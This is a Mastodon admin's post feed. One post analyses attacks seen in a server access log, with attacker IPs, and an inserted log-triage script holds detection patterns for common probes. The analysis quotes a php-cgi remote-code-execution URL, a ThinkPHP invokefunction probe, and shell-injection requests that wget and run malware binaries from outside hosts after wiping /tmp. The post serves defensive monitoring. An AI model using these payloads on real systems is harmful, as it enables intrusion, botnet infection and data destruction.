
I just got a much needed haircut. Turns out I wasn't going blind!

If you know something would make someone's day, and you know it's true, why not say it?

If you like the country someone comes from, or if you like what someone cooked, just say it.

We always like hearing sincere compliments, so why not take the first step? 👍

@supernova System administration, security, and development, in that order, although my sysadmin experience is much more extended.

Does anyone know of a European IT company hiring English speakers? I am willing to learn the local language, but I will probably not have full proficiency on day one.

I'm thinking Ireland, Switzerland, Germany, Norway, Finland, although I can also consider Canada, New Zealand, Australia and other countries outside of Europe.

Please, contact me or let me know where I can apply!

I'm now on FreeNode with the nick L1Cafe. Recommend me techy channels to join! :D

fediadmin, security, long 

Did not clear my access log for some time, amassing over 300MBs.

What I looked at

Common attack patterns (SQLi, BOF, path traversal etc.)
Common attack URLs (e.g. https://github.com/danielmiessler/SecLists/)
Bad and unusual HTTP status codes
POST requests against unusual places (no inbox, push)

Findings

One IP tries to actively enumerate Fedi accounts: 75.64.236[.]168
241 IPs tried to blindly exploit non-fedi-specific services, e.g. SQL injects, posting shells
53 IPs did enumeration only, looking for exploitable services and shells
Most popular was checking for Wordpress, phpMyAdmin and looking for existing shells
The crawler from fediverse[.]space seems okay, but if you want to block: 64.227.114[.]249

Details

Top attackers

211.21.226[.]123 Taiwan
122.14.213[.]79 China
113.53.230[.]34 Thailand
150.109.78[.]53 Singapore
118.25.38[.]1 China
118.25.111[.]38 China
106.12.40[.]125 China
103.45.99[.]20 China
47.199.217[.]59 US

The longest attack URL, used by many Chinese attackers

"POST /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1"

This URL decodes to:

-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n

I'd rather not Think PHP, thanks

"GET /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1"

Ask and thou shalt receive. 16 attackers asked for a shell.

GET /shell.php HTTP/1.1

Kinda cute

"GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.137.154[.]33/reaper/reap.arm4;chmod+777+/tmp/reap.arm4;sh+/tmp/reap.arm4 HTTP/1.1" 404 146 "-" "Hello, world" "-"

"GET /shell?cd+/tmp;rm+-rf+*;wget+http://117.13.206[.]99:34286/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1"

"GET /card_scan_decoder.php?No=30&door=%60wget http://switchnets[.]net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear%60 HTTP/1.1"

Top unusual request lines

24 "https[:]//volcable.ru/"
21 "https[:]//jyvopys.com/"
18 "https[:]//vulkan-platinym24.ru/"
18 "https[:]//sexjk.com/"
18 "https[:]//glassdeskguide.com/"
18 "https[:]//dezgorkontrol.ru/"
18 "https[:]//brendof-club.com/"
18 "https[:]//arabic-poetry.com/"
18 "http[:]//hacron.ru/"
15 "https[:]//se.painting-planet.com/"
15 "https[:]//landofgames.ru/"

#fediadmin #mastoadmin
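The four checks listed in the post above (attack patterns, known probe URLs, odd status codes, POSTs outside the inbox/push endpoints) can be scripted over a combined-format nginx/Apache access log. This is an added example, not code from the original post; the sample log lines and IPs are constructed (RFC 5737 ranges), and the signature lists, the "normal" POST paths and the "bad" status codes are assumptions to be tuned per instance.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# nginx/Apache "combined" log format; referer and user-agent are parsed but unused here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Assumed signatures for the post's categories: generic injection/traversal attempts,
# and enumeration of well-known software or dropped shells (wp-login, phpMyAdmin, shell.php, ...).
SIGNATURES = {
    "sqli": re.compile(r"(?i)(union\s+select|'\s*or\s+1=1|sleep\(\d+\))"),
    "traversal": re.compile(r"(?i)(\.\./|/etc/passwd)"),
    "enumeration": re.compile(r"(?i)(wp-login\.php|xmlrpc\.php|phpmyadmin|/shell\.php|cgi-bin/php-cgi|invokefunction)"),
}
# POST targets that are normal on a Mastodon instance (ActivityPub inboxes, push, the API); assumption.
LEGIT_POST = re.compile(r"^(/inbox|/users/[^/]+/inbox|/api/)")
BAD_STATUS = {"400", "403", "405", "500"}  # 404 is too noisy to count on its own

# Constructed sample lines, modelled on the probes quoted in the post.
SAMPLE_LOG = [
    '203.0.113.7 - - [03/Mar/2019:10:00:01 +0000] "POST /inbox HTTP/1.1" 202 0 "-" "http.rb/3.3.0 (Mastodon/2.7.1; +https://example.social/)"',
    '198.51.100.9 - - [03/Mar/2019:10:00:02 +0000] "GET /shell.php HTTP/1.1" 404 146 "-" "Hello, world"',
    '198.51.100.9 - - [03/Mar/2019:10:00:03 +0000] "GET /index.php?s=/Index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array HTTP/1.1" 404 146 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [03/Mar/2019:10:00:04 +0000] "POST /wp-login.php HTTP/1.1" 405 0 "-" "python-requests/2.21"',
    '192.0.2.45 - - [03/Mar/2019:10:00:05 +0000] "GET /api/v1/accounts/1?id=1%27%20or%201=1 HTTP/1.1" 200 512 "-" "curl/7.64"',
]

def classify(line):
    """Return the set of suspicious categories one log line matches (empty set = nothing notable)."""
    m = LOG_RE.match(line)
    if not m:
        return {"unparseable"}
    path = unquote(m["path"])  # decode %27, %20 etc. so signatures see the real payload
    findings = {name for name, rx in SIGNATURES.items() if rx.search(path)}
    if m["method"] == "POST" and not LEGIT_POST.match(path):
        findings.add("odd-post")
    if m["status"] in BAD_STATUS:
        findings.add("bad-status")
    return findings

def triage(lines):
    """Aggregate findings per client IP, so a noisy scanner counts once per category."""
    per_ip = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        per_ip[m["ip"] if m else "unparseable"].update(classify(line))
    return dict(per_ip)

if __name__ == "__main__":
    for ip, cats in sorted(triage(SAMPLE_LOG).items()):
        print(ip, sorted(cats) or "clean")
```

Feed it a real log with `triage(open("access.log"))` and sort by the number of categories per IP to get the "top attackers" list the post shows.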

Does anyone know why I can reach reserved IPv4 address spaces like 10.200.0.0/16 from my OVH server?

OK, WireGuard time. First time using it, wish me luck. :blobthinkingeyes:

Hi! Do you know good books on climate research and terraforming? If you don't, can you boost / retweet this so it reaches more people? Maybe some of your followers know! Thanks!

@vickysteeves Hey, it's fine to not be good at "writing full things", nobody can be good at everything simultaneously, why not delegate?

@sheogorath My blog has date-style post links. The only downside is that it will break old links, so search engines and old notes need to be updated for that. l1cafe.blog/2019/03/03/kuya-1- for example.


León Castillejos's choices:

Mastodon 🔐 privacytools.io

Fast, secure and up-to-date instance. PrivacyTools provides knowledge and tools to protect your privacy against global mass surveillance.

Website: privacytools.io
Matrix Chat: chat.privacytools.io
Support us on OpenCollective, many contributions are tax deductible!